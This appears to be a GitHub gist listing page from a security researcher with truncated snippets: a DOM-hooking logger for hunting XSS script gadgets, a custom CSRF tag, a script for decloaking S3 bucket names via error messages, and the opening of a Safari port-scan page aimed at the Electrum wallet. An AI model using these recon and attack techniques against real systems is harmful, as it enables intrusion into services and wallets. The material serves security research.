
fransr / logger.js
Last active Nov 29, 2021
logger.js for hunting script gadgets. More info about script gadgets: https://github.com/google/security-research-pocs/tree/master/script-gadgets (Sebastian Lekies / Eduardo Vela Nava / Krzysztof Kotowicz)
var logger = console.trace;
// ELEMENT
// Instrument Element.prototype.getElementById: every call is traced (query,
// receiver, receiver's innerHTML) and then forwarded to the implementation
// captured in `original`.
// NOTE(review): in the DOM spec getElementById lives on Document and
// DocumentFragment, not Element, so the captured value may be undefined on a
// stock browser and Reflect.apply would then throw — confirm the intended
// prototype.
;(function (original) {
  Element.prototype.getElementById = function (query) {
    const receiver = this;
    logger('getElementById', query, receiver, receiver.innerHTML);
    return Reflect.apply(original, receiver, [query]);
  };
})(Element.prototype.getElementById);
fransr / customcsrf.py
Created Feb 16, 2021
Hackvertor Custom CSRF tag
import httplib
import urllib
# HTTPS connection to the host serving the CSRF endpoint (port 443).
# Constructing the object does not send anything; the request is issued by
# http.request() below.
http = httplib.HTTPSConnection('example.com', 443)
# Cookie string for the request — presumably placed in the request header
# dict, which continues past this excerpt; confirm.
# NOTE(review): placeholder value — supply a real session cookie from
# configuration rather than hard-coding it in the script.
cookie = 'your=cookies';
http.request("GET", "/api/v1/csrf", "", {
'user-agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36',
'referer': 'https://example.com/',
fransr / bucket-disclose.sh
Last active Jun 28, 2022
Using error messages to decloak an S3 bucket. Uses SOAP, unicode, POST, multipart, streaming and index listing as ways of figuring it out. You need a valid AWS access key (never the secret key) to get the error messages.
#!/bin/bash
# Written by Frans Rosén (twitter.com/fransrosen)
_debug="$2" #turn on debug (taken from the second positional argument)
_timeout="20" #request timeout, presumably in seconds — its use is below this excerpt
#You need a valid access key, since the errors only happen after AWS validates that
#the key exists. The secret key is not needed, only the access key id.
#NOTE(review): placeholder value — prefer reading it from an environment variable
#so a real key is never committed alongside the script.
_aws_key="AKIA..."
#Request header strings (Accept-Language / User-Agent); how they are sent is below this excerpt.
H_ACCEPT="accept-language: en-US,en;q=0.9,sv;q=0.8,zh-TW;q=0.7,zh;q=0.6,fi;q=0.5,it;q=0.4,de;q=0.3"
H_AGENT="user-agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Safari/537.36"
fransr / electrum.html
Last active Nov 30, 2021
Simple port scan using embed+onerror in Safari to send GUI commands to Electrum 3.0.4 without needing any CORS headers
<body>
<style>pre { white-space: inherit }</style>
<!-- Output area; the script below appends its log entries here (electrum.log / electrum.logbreak). -->
<pre id="log"></pre>
<!-- Hidden container: kept in the DOM but never rendered. Its use is in the script, which is cut off in this excerpt. -->
<div id="ports" style="visibility: hidden; height: 0; width: 0;"></div>
<!-- Hidden iframe named "x"; its use is in the script, which is cut off in this excerpt. -->
<iframe src="about:blank" name="x" id="x" style="display: none;"></iframe>
</body>
<script>
var electrum = {
logbreak: function() { e = document.createElement('br'); document.getElementById('log').appendChild(e); },
log: function(s) { e = document.createElement('span'); e.innerText = s+" "; document.getElementById('log').appendChild(e); },
fransr / gist:db901674466ec5d9fe2e73da6c79818b
Created Aug 10, 2017
Chinese whispers bookmarklet using Google Translate
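javascript:(function () {
  /* "Chinese whispers" bookmarklet for Google Translate: the text in #source is
     translated through a chain of hop languages (popped from the list scraped
     from the page's NND global) and finally back to the starting language; the
     result is written into #result_box. Each hop opens the translate page in a
     popup named "x" with a "#from/to/text" hash and polls it until #result_box
     is populated.
     Block comments only: a bookmarklet may be collapsed onto a single line,
     which would turn a line comment into a comment-out of everything after it. */

  /* getElementById wrapper taking a "#id" selector and an optional document. */
  function $(selector, root) {
    const doc = root ? root : document;
    return doc.getElementById(selector.substr(1));
  }

  const j = $;
  /* Starting language: first segment of the "#from/to/text" hash, default 'en'. */
  let i = location.hash.substr(1).split('/')[0] || 'en';
  if (i === 'auto') i = 'en';
  /* Candidate hop languages, deduplicated; consumed from the end with pop(). */
  let a = JSON.stringify(NND).match(/[a-zA-Z-]+/g);
  a = [...new Set(a)];
  /* Languages never used as a hop target: the start language plus a fixed skip
     list. Declared locally — the original leaked `d` as an implicit global. */
  const d = [i, 'or', 'ug', 'tt', 'tk', 'mg', 'lo', 'rw', 'si', 'zh'];
  let o = i;  /* language the current text is in */
  let x;      /* popup window handle (named "x", reused on every hop) */
  let p;      /* setInterval id used to poll the popup */
  let c = 0;  /* hop counter, capped at 100 */
  let e = 0;  /* 1 once the closing hop back to `i` has been issued */

  /* Translate `v` (currently in language `o`) into the next hop language. */
  function n(v) {
    c++;
    let l = a.pop();
    while (l == o || d.includes(l)) l = a.pop();
    if (!l || c > 100) {
      if (e) {
        /* Closing hop already done: publish the result in the opener and close the popup. */
        j('#result_box').innerText = v;
        x.close();
        return;
      }
      /* Out of languages or hop limit reached: one final hop back to the start language. */
      l = i;
      e = 1;
    }
    console.log(o, l, v);
    /* The random query string defeats caching; the hash carries from/to/text. */
    x = window.open(
      location.href.split('#')[0] + '?' + Math.random() + '#' + o + '/' + l + '/' + v.replace(/ /g, '%20'),
      'x'
    );
    o = l;
    p = setInterval(q, 500);
  }

  /* Poll the popup until #result_box has text, then feed it into the next hop. */
  function q() {
    const box = j('#result_box', x.document);
    if (!box || !box.innerText) return;
    clearInterval(p);
    /* Local binding — the original leaked `txt` as an implicit global. */
    const txt = box.innerText;
    n(txt);
  }

  n(j('#source').value);
})();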

Keybase proof

I hereby claim:

  • I am fransr on github.
  • I am frans (https://keybase.io/frans) on keybase.
  • I have a public key whose fingerprint is C999 46C3 C7B8 A275 7FD2 8B6F 8D76 6CC3 6F62 00D9

To claim this, I am signing this object: